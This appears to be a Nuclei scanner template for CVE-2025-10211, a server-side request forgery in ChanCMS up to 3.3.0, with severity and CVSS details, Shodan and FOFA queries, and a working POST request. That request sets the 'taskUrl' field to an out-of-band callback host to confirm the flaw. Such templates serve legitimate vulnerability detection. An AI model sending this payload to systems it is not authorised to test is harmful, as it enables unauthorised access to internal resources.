id: CVE-2025-10211 info: name: ChanCMS <= 3.3.0 - Server-Side Request Forgery author: Yu_Bao severity: medium description: | yanyutao0402 ChanCMS 3.3.0 contains a server-side request forgery caused by manipulation of the "taskUrl" argument in /cms/collect/getArticle, letting remote attackers make arbitrary requests, exploit requires no special privileges. impact: | Remote attackers can make arbitrary requests from the server, potentially accessing internal resources or sensitive data. remediation: | Update to the latest version of ChanCMS. reference: - https://gitee.com/yanyutao0402/ChanCMS - https://vuldb.com/?id.323484 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L cvss-score: 6.3 cve-id: CVE-2025-10211 epss-score: 0.05966 epss-percentile: 0.909 cwe-id: CWE-918 metadata: verified: true max-request: 1 shodan-query: http.html:"ChanCMS" fofa-query: body="ChanCMS" tags: cve,cve2025,chancms,ssrf,oast,oob,vkev http: - method: POST path: - "{{BaseURL}}/cms/collect/getArticle" headers: Content-Type: application/json body: | { "taskUrl": "http://{{interactsh-url}}", "titleTag": "title", "articleTag": "body", "parseData": "return data;" } matchers: - type: dsl dsl: - contains(interactsh_protocol, 'dns') - contains_all(response, 'success','article') - status_code == 200 condition: and # digest: 4a0a00473045022100b5401c3e293b19fc871398e265573825945159a9bc9e20c1783302f9f6970ec3022036028002e6948f5e61b943cdd9aada8994e039fd89df6d085ab78a11fc9ca1d0:922c64590222798bb761d5b6d8e72950